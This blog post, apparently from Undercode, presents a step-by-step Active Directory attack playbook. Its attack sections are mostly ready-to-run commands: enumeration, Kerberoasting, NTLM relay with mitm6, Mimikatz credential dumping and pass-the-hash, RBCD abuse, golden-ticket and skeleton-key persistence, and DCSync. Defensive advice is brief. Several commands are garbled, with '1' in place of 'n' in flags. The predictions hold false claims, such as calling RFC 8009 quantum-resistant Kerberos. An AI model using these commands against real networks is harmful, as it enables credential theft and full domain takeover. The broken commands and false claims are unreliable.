Listen to this Post

Introduction:
Active Directory (AD) remains the most targeted identity system in enterprise environments, with 74% of breaches involving compromised identities according to the Verizon DBIR 2025. This guide transforms the “AD Pentest Mindmap” from a static visual into an actionable, hands‑on playbook. You will learn to navigate the full attack lifecycle — from stealthy enumeration to complete domain takeover — using real commands, proven tools, and defensive countermeasures.
Learning Objectives:
– Objective 1: Perform comprehensive AD enumeration using PowerView, BloodHound, and native Windows/Linux tools.
– Objective 2: Execute and mitigate key credential attacks, including Kerberoasting, AS‑REP Roasting, and NTLM relay.
– Objective 3: Master lateral movement, privilege escalation, persistence, and domain dominance techniques with Mimikatz, Impacket, and Rubeus.
You Should Know:
1. Enumeration: Laying the Foundation for Attack
Effective reconnaissance is the cornerstone of any AD compromise. Attackers first map the domain structure, users, groups, and systems to identify misconfigurations and potential entry points.
Step‑by‑Step Guide
1.1. Linux‑Based Enumeration (From a Non‑Domain Joined Attack Box)
Add target domain and DC to /etc/hosts echo "192.168.1.10 dc.domain.local domain.local" >> /etc/hosts Basic LDAP enumeration with ldapsearch ldapsearch -x -H ldap://dc.domain.local -b "DC=domain,DC=local" -D "DOMAIN\username" -w 'password' SMB share enumeration smbclient -L //dc.domain.local -U domain.local/username%password enum4linux -a 192.168.1.10 Kerberos user enumeration with Kerbrute kerbrute userenum -d domain.local --dc 192.168.1.10 user_wordlist.txt
1.2. Windows‑Based In‑Depth Enumeration (Compromised Domain‑Joined Host)
Load PowerView (part of PowerSploit) Import-Module .\PowerView.ps1 Get current domain and SID Get-Domain Get-DomainSID Enumerate all domain users and export to file Get-DomainUser | Out-File -FilePath .\DomainUsers.txt Find users with specific properties (e.g., SPN set) Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname Enumerate domain computers with operating system Get-DomainComputer -Properties OperatingSystem,Name,DnsHostName | Sort-Object -Property DnsHostName Identify live machines Get-DomainComputer -Ping -Properties OperatingSystem,Name,DnsHostName Find domain admins Get-DomainGroupMember -Identity "Domain Admins" | Select-Object MemberName Enumerate ACLs for a specific object Get-DomainObjectAcl -Identity "TargetUser" -ResolveGUIDs
1.3. BloodHound: Visualizing Attack Paths
Data collection from Linux using BloodHound.py bloodhound-python -d domain.local -u username -p 'password' -1s 192.168.1.10 -c All On Windows, use SharpHound (PowerShell) .\SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain domain.local Import JSON files into BloodHound GUI (Neo4j backend) Then run Cypher queries, e.g., "Find all Domain Admins" MATCH (u:User) WHERE u.domain = "DOMAIN.LOCAL" AND u.admincount = True RETURN u
BloodHound.py is a python data collector used to enumerate Active Directory information and store the data in JSON files that can be ingested by the BloodHound UI.
2. Credential Attacks & Exploitation: Stealing Keys to the Kingdom
Once enumeration is complete, attackers extract credentials via Kerberos abuses, NTLM relaying, and hash dumping.
Step‑by‑Step Guide
2.1. Kerberoasting & AS‑REP Roasting
From Linux with Impacket Request Kerberos TGS for accounts with SPNs (Kerberoasting) GetUserSPNs.py domain.local/username:password -dc-ip 192.168.1.10 -request Crack obtained hash with hashcat hashcat -m 13100 kerberoast_hash.txt /usr/share/wordlists/rockyou.txt AS‑REP Roasting for users without pre‑authentication GetNPUsers.py domain.local/ -usersfile usernames.txt -dc-ip 192.168.1.10 -format hashcat
2.2. NTLM Relay & Pass‑the‑Hash (PtH) Attacks
Set up NTLM relay with ntlmrelayx (Impacket) ntlmrelayx.py -tf targets.txt -smb2support -of hashes.txt Combine with MITM6 to poison IPv6 DNS (full domain takeover) mitm6 -d domain.local Then relay captured NTLM auth to LDAP/LDAPS to create a malicious machine account From Windows, perform Pass‑the‑Hash Load Mimikatz mimikatz.exe privilege::debug sekurlsa::logonpasswords Dump NTLM hashes from LSASS Pass the hash to another machine sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash_value Then launch cmd or PSExec to the target
2.3. Dumping Credentials with Mimikatz
Invoke Mimikatz via PowerShell (must be elevated) Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' Extract Kerberos tickets Invoke-Mimikatz -Command '"kerberos::list" "kerberos::tgt"'
Pass‑the‑Hash attacks facilitate lateral movement by allowing the reuse of stolen NTLM hashes without cracking passwords, which can lead to privilege escalation and domain compromise. Kerberoasting enables offline cracking of passwords for accounts with SPNs.
3. Lateral Movement & Privilege Escalation: Spreading Through the Network
With valid credentials, attackers pivot across systems, escalating from a standard user to domain administrator.
Step‑by‑Step Guide
3.1. PowerShell Remoting & WinRM
Enable PSRemoting on target (if not already)
Enable-PSRemoting -Force
Invoke command remotely
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami } -Credential $cred
Establish persistent session
$session = New-PSSession -ComputerName TARGET -Credential $cred
Enter-PSSession $session
3.2. Impacket Suite for Remote Code Execution
Execute commands via SMB (psexec) psexec.py domain.local/administrator:'password'@192.168.1.20 Pass‑the‑hash with wmiexec wmiexec.py -hashes :ntlm_hash domain.local/[email protected] Remote service control with atexec atexec.py domain.local/administrator:'password'@192.168.1.20 'whoami'
3.3. Exploiting Delegation & ACLs
Abuse Resource‑Based Constrained Delegation (RBCD) Create a new computer account (by default any domain user can create up to 10) addcomputer.py -computer-1ame 'ATTACKER$' -computer-pass 'Password123' domain.local/username:password Then set RBCD on a target machine rbcd.py -delegate-from 'ATTACKER$' -delegate-to 'DC$' -action write domain.local/username:password Now impersonate domain admin to request a service ticket getST.py -spn 'cifs/dc.domain.local' -impersonate 'Administrator' domain.local/attacker$:Password123
4. Persistence & Post‑Exploitation: Ensuring Long‑Term Access
Once domain dominance is achieved, attackers install backdoors that survive reboots and password changes.
Step‑by‑Step Guide
4.1. Golden Ticket Attack
From a compromised domain controller, retrieve krbtgt hash mimikatz.exe lsadump::dcsync /user:domain\krbtgt Forge a golden ticket (valid for any user for 10 years) kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:krbtgt_hash /id:500 /ptt Now access any resource without authentication dir \\dc.domain.local\c$
4.2. Skeleton Key Attack
Inject a skeleton key into LSASS on the Domain Controller mimikatz.exe privilege::debug misc::skeleton Any domain user can now authenticate using the master password "mimikatz" net use \\dc.domain.local\IPC$ /user:domain.local\anyuser mimikatz
The Golden Ticket attack uses the `krbtgt` account’s NTLM hash to forge Kerberos TGTs, granting unrestricted domain access. The Skeleton Key attack patches LSASS to accept a universal master password, enabling persistent access without raising alerts.
5. Domain Dominance: The Final Objective
Domain dominance means full administrative control over the Active Directory forest, allowing attackers to disable logging, extract all data, and use the domain as a launchpad for further attacks.
Step‑by‑Step Guide
5.1. DCSync Attack – Extracting Every Credential
From a compromised account with replication rights secretsdump.py domain.local/administrator:'password'@192.168.1.10 -just-dc-1tlm Use Mimikatz to perform DCSync remotely mimikatz.exe lsadump::dcsync /user:domain.local\krbtgt lsadump::dcsync /user:domain.local\Administrator
5.2. MITM6 + NTLM Relay Chain – Complete Domain Compromise Without Malware
Attacker machine: mitm6 -d domain.local Spoof DHCPv6/DNS ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker.wpad -add-computer The relayed authentication creates a machine account with RBCD Then impersonate Domain Admin to dump NTDS.dit secretsdump.py -hashes :relayed_hash domain.local/COMPUTER\[email protected] Use CrackMapExec for lateral movement and data extraction crackmapexec smb domain.local -u administrator -H ntlm_hash --1tds drsuapi
This attack chain weaponizes default IPv6 behavior in Windows networks to relay NTLM authentications, creating a new machine account that can impersonate any privileged user, ultimately seizing domain‑wide control.
What Undercode Say:
– Key Takeaway 1: Active Directory pentesting is not a linear process; it requires iterative enumeration, exploitation, and pivoting. Tools like BloodHound and PowerView are essential for mapping complex ACLs and trust relationships.
– Key Takeaway 2: Defenders must focus on reducing the attack surface: disable NTLM where possible, enforce Kerberos with AES, limit `ms-DS-MachineAccountQuota` to 0, and monitor for abnormal replication requests (DCSync) and anomaly Kerberos ticket requests.
Analysis (approx. 10 lines):
Modern AD environments remain critically vulnerable to identity‑based attacks. The shift from malware‑centric to credential‑centric breaches (74% of incidents) underscores that traditional antivirus and perimeter defenses are obsolete. Attackers now chain seemingly low‑severity misconfigurations — such as over‑privileged ACLs, unconstrained delegation, and IPv6 reliance — into full domain compromise within minutes. For blue teams, the focus must shift to continuous identity risk visualization (e.g., BloodHound CE, Qualys ETM) and proactive hardening: disable IPv6 if unused, enforce SMB signing, rotate `krbtgt` passwords regularly, and implement tiered administrative models. Organizations that fail to adopt these measures will inevitably suffer a catastrophic AD breach.
Prediction:
– +1 AI‑driven AD attack path mapping tools will soon automate 80% of enumeration and privilege escalation, reducing skilled hacker time from days to minutes.
– -1 As more enterprises migrate to Azure AD/Entra ID, legacy on‑prem AD forests will become neglected “shadow IT” backdoors, increasingly targeted by ransomware groups.
– -1 The rise of quantum‑resistant Kerberos (RFC 8009) will render many current golden‑ticket mitigation techniques ineffective, creating a new wave of exploit opportunities.
– +1 Defensive AI that correlates LDAP queries, Kerberos ticket requests, and replication activities will detect in‑progress attacks in real time, blocking lateral movement before domain takeover.
– -1 Homomorphic encryption integrated into AD could make traditional credential dumping obsolete, forcing attackers to shift to supply‑chain and social‑engineering vectors.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Shikhhayadav Activedirectory](https://www.linkedin.com/posts/shikhhayadav_activedirectory-redteam-pentesting-share-7464215481902600192-NbDq/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)


